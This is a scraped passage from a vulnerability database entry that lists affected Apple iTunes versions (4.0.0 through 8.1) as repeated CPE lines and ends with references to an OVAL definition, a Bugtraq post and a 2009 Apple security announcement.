- Apple>>Itunes >> Version 4.0.0 (Open CPE detail)
Apple>>Itunes >> Version 4.0.0
- Apple>>Itunes >> Version 4.0.0 (Open CPE detail)
Apple>>Itunes >> Version 4.0.0
- Apple>>Itunes >> Version 4.0.0 (Open CPE detail)
Apple>>Itunes >> Version 4.0.1
- Apple>>Itunes >> Version 4.0.1 (Open CPE detail)
- Apple>>Itunes >> Version 4.0.1 (Open CPE detail)
- Apple>>Itunes >> Version 4.0.1 (Open CPE detail)
Apple>>Itunes >> Version 4.0.1
- Apple>>Itunes >> Version 4.0.1 (Open CPE detail)
Apple>>Itunes >> Version 4.0.1
- Apple>>Itunes >> Version 4.0.1 (Open CPE detail)
Apple>>Itunes >> Version 4.0.1
- Apple>>Itunes >> Version 4.0.1 (Open CPE detail)
Apple>>Itunes >> Version 4.1
Apple>>Itunes >> Version 4.1
Apple>>Itunes >> Version 4.1.0
- Apple>>Itunes >> Version 4.1.0 (Open CPE detail)
- Apple>>Itunes >> Version 4.1.0 (Open CPE detail)
- Apple>>Itunes >> Version 4.1.0 (Open CPE detail)
Apple>>Itunes >> Version 4.1.0
- Apple>>Itunes >> Version 4.1.0 (Open CPE detail)
Apple>>Itunes >> Version 4.1.0
- Apple>>Itunes >> Version 4.1.0 (Open CPE detail)
Apple>>Itunes >> Version 4.2
Apple>>Itunes >> Version 4.2
Apple>>Itunes >> Version 4.2.0
- Apple>>Itunes >> Version 4.2.0 (Open CPE detail)
- Apple>>Itunes >> Version 4.2.0 (Open CPE detail)
- Apple>>Itunes >> Version 4.2.0 (Open CPE detail)
Apple>>Itunes >> Version 4.2.0
- Apple>>Itunes >> Version 4.2.0 (Open CPE detail)
Apple>>Itunes >> Version 4.2.0
- Apple>>Itunes >> Version 4.2.0 (Open CPE detail)
Apple>>Itunes >> Version 4.2.72
Apple>>Itunes >> Version 4.2.72
Apple>>Itunes >> Version 4.5
- Apple>>Itunes >> Version 4.5 (Open CPE detail)
- Apple>>Itunes >> Version 4.5 (Open CPE detail)
Apple>>Itunes >> Version 4.5
- Apple>>Itunes >> Version 4.5 (Open CPE detail)
Apple>>Itunes >> Version 4.5.0
- Apple>>Itunes >> Version 4.5.0 (Open CPE detail)
- Apple>>Itunes >> Version 4.5.0 (Open CPE detail)
- Apple>>Itunes >> Version 4.5.0 (Open CPE detail)
Apple>>Itunes >> Version 4.5.0
- Apple>>Itunes >> Version 4.5.0 (Open CPE detail)
Apple>>Itunes >> Version 4.5.0
- Apple>>Itunes >> Version 4.5.0 (Open CPE detail)
Apple>>Itunes >> Version 4.6
- Apple>>Itunes >> Version 4.6 (Open CPE detail)
- Apple>>Itunes >> Version 4.6 (Open CPE detail)
Apple>>Itunes >> Version 4.6
- Apple>>Itunes >> Version 4.6 (Open CPE detail)
Apple>>Itunes >> Version 4.6.0
- Apple>>Itunes >> Version 4.6.0 (Open CPE detail)
- Apple>>Itunes >> Version 4.6.0 (Open CPE detail)
- Apple>>Itunes >> Version 4.6.0 (Open CPE detail)
Apple>>Itunes >> Version 4.6.0
- Apple>>Itunes >> Version 4.6.0 (Open CPE detail)
Apple>>Itunes >> Version 4.6.0
- Apple>>Itunes >> Version 4.6.0 (Open CPE detail)
Apple>>Itunes >> Version 4.7
- Apple>>Itunes >> Version 4.7 (Open CPE detail)
- Apple>>Itunes >> Version 4.7 (Open CPE detail)
Apple>>Itunes >> Version 4.7
- Apple>>Itunes >> Version 4.7 (Open CPE detail)
Apple>>Itunes >> Version 4.7.0
- Apple>>Itunes >> Version 4.7.0 (Open CPE detail)
- Apple>>Itunes >> Version 4.7.0 (Open CPE detail)
- Apple>>Itunes >> Version 4.7.0 (Open CPE detail)
Apple>>Itunes >> Version 4.7.0
- Apple>>Itunes >> Version 4.7.0 (Open CPE detail)
Apple>>Itunes >> Version 4.7.0
- Apple>>Itunes >> Version 4.7.0 (Open CPE detail)
Apple>>Itunes >> Version 4.7.1
- Apple>>Itunes >> Version 4.7.1 (Open CPE detail)
- Apple>>Itunes >> Version 4.7.1 (Open CPE detail)
- Apple>>Itunes >> Version 4.7.1 (Open CPE detail)
- Apple>>Itunes >> Version 4.7.1 (Open CPE detail)
Apple>>Itunes >> Version 4.7.1
- Apple>>Itunes >> Version 4.7.1 (Open CPE detail)
- Apple>>Itunes >> Version 4.7.1 (Open CPE detail)
Apple>>Itunes >> Version 4.7.1
- Apple>>Itunes >> Version 4.7.1 (Open CPE detail)
Apple>>Itunes >> Version 4.7.1
- Apple>>Itunes >> Version 4.7.1 (Open CPE detail)
Apple>>Itunes >> Version 4.7.1.30
Apple>>Itunes >> Version 4.7.1.30
Apple>>Itunes >> Version 4.7.2
- Apple>>Itunes >> Version 4.7.2 (Open CPE detail)
Apple>>Itunes >> Version 4.8
Apple>>Itunes >> Version 4.8
Apple>>Itunes >> Version 4.8.0
- Apple>>Itunes >> Version 4.8.0 (Open CPE detail)
- Apple>>Itunes >> Version 4.8.0 (Open CPE detail)
- Apple>>Itunes >> Version 4.8.0 (Open CPE detail)
Apple>>Itunes >> Version 4.8.0
- Apple>>Itunes >> Version 4.8.0 (Open CPE detail)
Apple>>Itunes >> Version 4.8.0
- Apple>>Itunes >> Version 4.8.0 (Open CPE detail)
Apple>>Itunes >> Version 4.9
Apple>>Itunes >> Version 4.9
Apple>>Itunes >> Version 4.9.0
- Apple>>Itunes >> Version 4.9.0 (Open CPE detail)
- Apple>>Itunes >> Version 4.9.0 (Open CPE detail)
- Apple>>Itunes >> Version 4.9.0 (Open CPE detail)
Apple>>Itunes >> Version 4.9.0
- Apple>>Itunes >> Version 4.9.0 (Open CPE detail)
Apple>>Itunes >> Version 4.9.0
- Apple>>Itunes >> Version 4.9.0 (Open CPE detail)
Apple>>Itunes >> Version 5.0
- Apple>>Itunes >> Version 5.0 (Open CPE detail)
- Apple>>Itunes >> Version 5.0 (Open CPE detail)
Apple>>Itunes >> Version 5.0
- Apple>>Itunes >> Version 5.0 (Open CPE detail)
Apple>>Itunes >> Version 5.0.0
- Apple>>Itunes >> Version 5.0.0 (Open CPE detail)
- Apple>>Itunes >> Version 5.0.0 (Open CPE detail)
- Apple>>Itunes >> Version 5.0.0 (Open CPE detail)
Apple>>Itunes >> Version 5.0.0
- Apple>>Itunes >> Version 5.0.0 (Open CPE detail)
Apple>>Itunes >> Version 5.0.0
- Apple>>Itunes >> Version 5.0.0 (Open CPE detail)
Apple>>Itunes >> Version 5.0.1
- Apple>>Itunes >> Version 5.0.1 (Open CPE detail)
- Apple>>Itunes >> Version 5.0.1 (Open CPE detail)
- Apple>>Itunes >> Version 5.0.1 (Open CPE detail)
Apple>>Itunes >> Version 5.0.1
- Apple>>Itunes >> Version 5.0.1 (Open CPE detail)
Apple>>Itunes >> Version 5.0.1
- Apple>>Itunes >> Version 5.0.1 (Open CPE detail)
Apple>>Itunes >> Version 5.0.1
- Apple>>Itunes >> Version 5.0.1 (Open CPE detail)
Apple>>Itunes >> Version 6.0
Apple>>Itunes >> Version 6.0
Apple>>Itunes >> Version 6.0.0
- Apple>>Itunes >> Version 6.0.0 (Open CPE detail)
- Apple>>Itunes >> Version 6.0.0 (Open CPE detail)
- Apple>>Itunes >> Version 6.0.0 (Open CPE detail)
Apple>>Itunes >> Version 6.0.0
- Apple>>Itunes >> Version 6.0.0 (Open CPE detail)
Apple>>Itunes >> Version 6.0.0
- Apple>>Itunes >> Version 6.0.0 (Open CPE detail)
Apple>>Itunes >> Version 6.0.1
- Apple>>Itunes >> Version 6.0.1 (Open CPE detail)
- Apple>>Itunes >> Version 6.0.1 (Open CPE detail)
- Apple>>Itunes >> Version 6.0.1 (Open CPE detail)
- Apple>>Itunes >> Version 6.0.1 (Open CPE detail)
Apple>>Itunes >> Version 6.0.1
- Apple>>Itunes >> Version 6.0.1 (Open CPE detail)
- Apple>>Itunes >> Version 6.0.1 (Open CPE detail)
Apple>>Itunes >> Version 6.0.1
- Apple>>Itunes >> Version 6.0.1 (Open CPE detail)
Apple>>Itunes >> Version 6.0.1
- Apple>>Itunes >> Version 6.0.1 (Open CPE detail)
Apple>>Itunes >> Version 6.0.2
- Apple>>Itunes >> Version 6.0.2 (Open CPE detail)
- Apple>>Itunes >> Version 6.0.2 (Open CPE detail)
- Apple>>Itunes >> Version 6.0.2 (Open CPE detail)
- Apple>>Itunes >> Version 6.0.2 (Open CPE detail)
Apple>>Itunes >> Version 6.0.2
- Apple>>Itunes >> Version 6.0.2 (Open CPE detail)
- Apple>>Itunes >> Version 6.0.2 (Open CPE detail)
Apple>>Itunes >> Version 6.0.2
- Apple>>Itunes >> Version 6.0.2 (Open CPE detail)
Apple>>Itunes >> Version 6.0.2
- Apple>>Itunes >> Version 6.0.2 (Open CPE detail)
Apple>>Itunes >> Version 6.0.3
- Apple>>Itunes >> Version 6.0.3 (Open CPE detail)
- Apple>>Itunes >> Version 6.0.3 (Open CPE detail)
- Apple>>Itunes >> Version 6.0.3 (Open CPE detail)
Apple>>Itunes >> Version 6.0.3
- Apple>>Itunes >> Version 6.0.3 (Open CPE detail)
Apple>>Itunes >> Version 6.0.3
- Apple>>Itunes >> Version 6.0.3 (Open CPE detail)
Apple>>Itunes >> Version 6.0.3
- Apple>>Itunes >> Version 6.0.3 (Open CPE detail)
Apple>>Itunes >> Version 6.0.4
- Apple>>Itunes >> Version 6.0.4 (Open CPE detail)
- Apple>>Itunes >> Version 6.0.4 (Open CPE detail)
- Apple>>Itunes >> Version 6.0.4 (Open CPE detail)
- Apple>>Itunes >> Version 6.0.4 (Open CPE detail)
Apple>>Itunes >> Version 6.0.4
- Apple>>Itunes >> Version 6.0.4 (Open CPE detail)
- Apple>>Itunes >> Version 6.0.4 (Open CPE detail)
Apple>>Itunes >> Version 6.0.4
- Apple>>Itunes >> Version 6.0.4 (Open CPE detail)
Apple>>Itunes >> Version 6.0.4
- Apple>>Itunes >> Version 6.0.4 (Open CPE detail)
Apple>>Itunes >> Version 6.0.4.2
Apple>>Itunes >> Version 6.0.4.2
Apple>>Itunes >> Version 6.0.5
- Apple>>Itunes >> Version 6.0.5 (Open CPE detail)
- Apple>>Itunes >> Version 6.0.5 (Open CPE detail)
- Apple>>Itunes >> Version 6.0.5 (Open CPE detail)
Apple>>Itunes >> Version 6.0.5
- Apple>>Itunes >> Version 6.0.5 (Open CPE detail)
Apple>>Itunes >> Version 6.0.5
- Apple>>Itunes >> Version 6.0.5 (Open CPE detail)
Apple>>Itunes >> Version 6.0.5
- Apple>>Itunes >> Version 6.0.5 (Open CPE detail)
Apple>>Itunes >> Version 7.0.0
- Apple>>Itunes >> Version 7.0.0 (Open CPE detail)
- Apple>>Itunes >> Version 7.0.0 (Open CPE detail)
- Apple>>Itunes >> Version 7.0.0 (Open CPE detail)
Apple>>Itunes >> Version 7.0.0
- Apple>>Itunes >> Version 7.0.0 (Open CPE detail)
Apple>>Itunes >> Version 7.0.0
- Apple>>Itunes >> Version 7.0.0 (Open CPE detail)
Apple>>Itunes >> Version 7.0.1
- Apple>>Itunes >> Version 7.0.1 (Open CPE detail)
- Apple>>Itunes >> Version 7.0.1 (Open CPE detail)
- Apple>>Itunes >> Version 7.0.1 (Open CPE detail)
Apple>>Itunes >> Version 7.0.1
- Apple>>Itunes >> Version 7.0.1 (Open CPE detail)
Apple>>Itunes >> Version 7.0.1
- Apple>>Itunes >> Version 7.0.1 (Open CPE detail)
Apple>>Itunes >> Version 7.0.2
- Apple>>Itunes >> Version 7.0.2 (Open CPE detail)
- Apple>>Itunes >> Version 7.0.2 (Open CPE detail)
- Apple>>Itunes >> Version 7.0.2 (Open CPE detail)
- Apple>>Itunes >> Version 7.0.2 (Open CPE detail)
Apple>>Itunes >> Version 7.0.2
- Apple>>Itunes >> Version 7.0.2 (Open CPE detail)
- Apple>>Itunes >> Version 7.0.2 (Open CPE detail)
Apple>>Itunes >> Version 7.0.2
- Apple>>Itunes >> Version 7.0.2 (Open CPE detail)
Apple>>Itunes >> Version 7.0.2
- Apple>>Itunes >> Version 7.0.2 (Open CPE detail)
Apple>>Itunes >> Version 7.1.0
- Apple>>Itunes >> Version 7.1.0 (Open CPE detail)
- Apple>>Itunes >> Version 7.1.0 (Open CPE detail)
- Apple>>Itunes >> Version 7.1.0 (Open CPE detail)
Apple>>Itunes >> Version 7.1.0
- Apple>>Itunes >> Version 7.1.0 (Open CPE detail)
Apple>>Itunes >> Version 7.1.0
- Apple>>Itunes >> Version 7.1.0 (Open CPE detail)
Apple>>Itunes >> Version 7.1.1
- Apple>>Itunes >> Version 7.1.1 (Open CPE detail)
- Apple>>Itunes >> Version 7.1.1 (Open CPE detail)
- Apple>>Itunes >> Version 7.1.1 (Open CPE detail)
Apple>>Itunes >> Version 7.1.1
- Apple>>Itunes >> Version 7.1.1 (Open CPE detail)
Apple>>Itunes >> Version 7.1.1
- Apple>>Itunes >> Version 7.1.1 (Open CPE detail)
Apple>>Itunes >> Version 7.2.0
- Apple>>Itunes >> Version 7.2.0 (Open CPE detail)
- Apple>>Itunes >> Version 7.2.0 (Open CPE detail)
- Apple>>Itunes >> Version 7.2.0 (Open CPE detail)
Apple>>Itunes >> Version 7.2.0
- Apple>>Itunes >> Version 7.2.0 (Open CPE detail)
Apple>>Itunes >> Version 7.2.0
- Apple>>Itunes >> Version 7.2.0 (Open CPE detail)
Apple>>Itunes >> Version 7.3.0
- Apple>>Itunes >> Version 7.3.0 (Open CPE detail)
- Apple>>Itunes >> Version 7.3.0 (Open CPE detail)
- Apple>>Itunes >> Version 7.3.0 (Open CPE detail)
Apple>>Itunes >> Version 7.3.0
- Apple>>Itunes >> Version 7.3.0 (Open CPE detail)
Apple>>Itunes >> Version 7.3.0
- Apple>>Itunes >> Version 7.3.0 (Open CPE detail)
Apple>>Itunes >> Version 7.3.1
- Apple>>Itunes >> Version 7.3.1 (Open CPE detail)
- Apple>>Itunes >> Version 7.3.1 (Open CPE detail)
- Apple>>Itunes >> Version 7.3.1 (Open CPE detail)
Apple>>Itunes >> Version 7.3.1
- Apple>>Itunes >> Version 7.3.1 (Open CPE detail)
Apple>>Itunes >> Version 7.3.1
- Apple>>Itunes >> Version 7.3.1 (Open CPE detail)
Apple>>Itunes >> Version 7.3.2
- Apple>>Itunes >> Version 7.3.2 (Open CPE detail)
- Apple>>Itunes >> Version 7.3.2 (Open CPE detail)
- Apple>>Itunes >> Version 7.3.2 (Open CPE detail)
- Apple>>Itunes >> Version 7.3.2 (Open CPE detail)
Apple>>Itunes >> Version 7.3.2
- Apple>>Itunes >> Version 7.3.2 (Open CPE detail)
- Apple>>Itunes >> Version 7.3.2 (Open CPE detail)
Apple>>Itunes >> Version 7.3.2
- Apple>>Itunes >> Version 7.3.2 (Open CPE detail)
Apple>>Itunes >> Version 7.3.2
- Apple>>Itunes >> Version 7.3.2 (Open CPE detail)
Apple>>Itunes >> Version 7.4
- Apple>>Itunes >> Version 7.4 (Open CPE detail)
- Apple>>Itunes >> Version 7.4 (Open CPE detail)
Apple>>Itunes >> Version 7.4
- Apple>>Itunes >> Version 7.4 (Open CPE detail)
Apple>>Itunes >> Version 7.4.0
- Apple>>Itunes >> Version 7.4.0 (Open CPE detail)
- Apple>>Itunes >> Version 7.4.0 (Open CPE detail)
- Apple>>Itunes >> Version 7.4.0 (Open CPE detail)
Apple>>Itunes >> Version 7.4.0
- Apple>>Itunes >> Version 7.4.0 (Open CPE detail)
Apple>>Itunes >> Version 7.4.0
- Apple>>Itunes >> Version 7.4.0 (Open CPE detail)
Apple>>Itunes >> Version 7.4.1
- Apple>>Itunes >> Version 7.4.1 (Open CPE detail)
- Apple>>Itunes >> Version 7.4.1 (Open CPE detail)
- Apple>>Itunes >> Version 7.4.1 (Open CPE detail)
- Apple>>Itunes >> Version 7.4.1 (Open CPE detail)
Apple>>Itunes >> Version 7.4.1
- Apple>>Itunes >> Version 7.4.1 (Open CPE detail)
- Apple>>Itunes >> Version 7.4.1 (Open CPE detail)
Apple>>Itunes >> Version 7.4.1
- Apple>>Itunes >> Version 7.4.1 (Open CPE detail)
Apple>>Itunes >> Version 7.4.1
- Apple>>Itunes >> Version 7.4.1 (Open CPE detail)
Apple>>Itunes >> Version 7.4.2
- Apple>>Itunes >> Version 7.4.2 (Open CPE detail)
- Apple>>Itunes >> Version 7.4.2 (Open CPE detail)
- Apple>>Itunes >> Version 7.4.2 (Open CPE detail)
- Apple>>Itunes >> Version 7.4.2 (Open CPE detail)
Apple>>Itunes >> Version 7.4.2
- Apple>>Itunes >> Version 7.4.2 (Open CPE detail)
- Apple>>Itunes >> Version 7.4.2 (Open CPE detail)
Apple>>Itunes >> Version 7.4.2
- Apple>>Itunes >> Version 7.4.2 (Open CPE detail)
Apple>>Itunes >> Version 7.4.2
- Apple>>Itunes >> Version 7.4.2 (Open CPE detail)
Apple>>Itunes >> Version 7.4.3
- Apple>>Itunes >> Version 7.4.3 (Open CPE detail)
- Apple>>Itunes >> Version 7.4.3 (Open CPE detail)
Apple>>Itunes >> Version 7.4.3
- Apple>>Itunes >> Version 7.4.3 (Open CPE detail)
Apple>>Itunes >> Version 7.5
- Apple>>Itunes >> Version 7.5 (Open CPE detail)
- Apple>>Itunes >> Version 7.5 (Open CPE detail)
Apple>>Itunes >> Version 7.5
- Apple>>Itunes >> Version 7.5 (Open CPE detail)
Apple>>Itunes >> Version 7.5.0
- Apple>>Itunes >> Version 7.5.0 (Open CPE detail)
- Apple>>Itunes >> Version 7.5.0 (Open CPE detail)
- Apple>>Itunes >> Version 7.5.0 (Open CPE detail)
Apple>>Itunes >> Version 7.5.0
- Apple>>Itunes >> Version 7.5.0 (Open CPE detail)
Apple>>Itunes >> Version 7.5.0
- Apple>>Itunes >> Version 7.5.0 (Open CPE detail)
Apple>>Itunes >> Version 7.6
- Apple>>Itunes >> Version 7.6 (Open CPE detail)
Apple>>Itunes >> Version 7.6
Apple>>Itunes >> Version 7.6.0
- Apple>>Itunes >> Version 7.6.0 (Open CPE detail)
- Apple>>Itunes >> Version 7.6.0 (Open CPE detail)
- Apple>>Itunes >> Version 7.6.0 (Open CPE detail)
Apple>>Itunes >> Version 7.6.0
- Apple>>Itunes >> Version 7.6.0 (Open CPE detail)
Apple>>Itunes >> Version 7.6.0
- Apple>>Itunes >> Version 7.6.0 (Open CPE detail)
Apple>>Itunes >> Version 7.6.1
- Apple>>Itunes >> Version 7.6.1 (Open CPE detail)
- Apple>>Itunes >> Version 7.6.1 (Open CPE detail)
- Apple>>Itunes >> Version 7.6.1 (Open CPE detail)
- Apple>>Itunes >> Version 7.6.1 (Open CPE detail)
Apple>>Itunes >> Version 7.6.1
- Apple>>Itunes >> Version 7.6.1 (Open CPE detail)
- Apple>>Itunes >> Version 7.6.1 (Open CPE detail)
Apple>>Itunes >> Version 7.6.1
- Apple>>Itunes >> Version 7.6.1 (Open CPE detail)
Apple>>Itunes >> Version 7.6.1
- Apple>>Itunes >> Version 7.6.1 (Open CPE detail)
Apple>>Itunes >> Version 7.6.2
- Apple>>Itunes >> Version 7.6.2 (Open CPE detail)
- Apple>>Itunes >> Version 7.6.2 (Open CPE detail)
- Apple>>Itunes >> Version 7.6.2 (Open CPE detail)
Apple>>Itunes >> Version 7.6.2
- Apple>>Itunes >> Version 7.6.2 (Open CPE detail)
Apple>>Itunes >> Version 7.6.2
- Apple>>Itunes >> Version 7.6.2 (Open CPE detail)
Apple>>Itunes >> Version 7.6.2
- Apple>>Itunes >> Version 7.6.2 (Open CPE detail)
Apple>>Itunes >> Version 7.7
- Apple>>Itunes >> Version 7.7 (Open CPE detail)
Apple>>Itunes >> Version 7.7
Apple>>Itunes >> Version 7.7.0
- Apple>>Itunes >> Version 7.7.0 (Open CPE detail)
- Apple>>Itunes >> Version 7.7.0 (Open CPE detail)
- Apple>>Itunes >> Version 7.7.0 (Open CPE detail)
Apple>>Itunes >> Version 7.7.0
- Apple>>Itunes >> Version 7.7.0 (Open CPE detail)
Apple>>Itunes >> Version 7.7.0
- Apple>>Itunes >> Version 7.7.0 (Open CPE detail)
Apple>>Itunes >> Version 7.7.1
- Apple>>Itunes >> Version 7.7.1 (Open CPE detail)
- Apple>>Itunes >> Version 7.7.1 (Open CPE detail)
- Apple>>Itunes >> Version 7.7.1 (Open CPE detail)
- Apple>>Itunes >> Version 7.7.1 (Open CPE detail)
Apple>>Itunes >> Version 7.7.1
- Apple>>Itunes >> Version 7.7.1 (Open CPE detail)
- Apple>>Itunes >> Version 7.7.1 (Open CPE detail)
Apple>>Itunes >> Version 7.7.1
- Apple>>Itunes >> Version 7.7.1 (Open CPE detail)
Apple>>Itunes >> Version 7.7.1
- Apple>>Itunes >> Version 7.7.1 (Open CPE detail)
Apple>>Itunes >> Version 8.0
Apple>>Itunes >> Version 8.0
Apple>>Itunes >> Version 8.0
Apple>>Itunes >> Version 8.0.0
- Apple>>Itunes >> Version 8.0.0 (Open CPE detail)
- Apple>>Itunes >> Version 8.0.0 (Open CPE detail)
- Apple>>Itunes >> Version 8.0.0 (Open CPE detail)
Apple>>Itunes >> Version 8.0.0
- Apple>>Itunes >> Version 8.0.0 (Open CPE detail)
Apple>>Itunes >> Version 8.0.0
- Apple>>Itunes >> Version 8.0.0 (Open CPE detail)
Apple>>Itunes >> Version 8.0.1
- Apple>>Itunes >> Version 8.0.1 (Open CPE detail)
- Apple>>Itunes >> Version 8.0.1 (Open CPE detail)
- Apple>>Itunes >> Version 8.0.1 (Open CPE detail)
Apple>>Itunes >> Version 8.0.1
- Apple>>Itunes >> Version 8.0.1 (Open CPE detail)
Apple>>Itunes >> Version 8.0.1
- Apple>>Itunes >> Version 8.0.1 (Open CPE detail)
Apple>>Itunes >> Version 8.0.2
Apple>>Itunes >> Version 8.0.2
Apple>>Itunes >> Version 8.1
Apple>>Itunes >> Version 8.1
References
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A17099
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
http://www.securityfocus.com/archive/1/504043/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
http://lists.apple.com/archives/security-announce/2009/Jun/msg00001.html
Tags : vendor-advisory, x_refsource_APPLE
Tags : vendor-advisory, x_refsource_APPLE
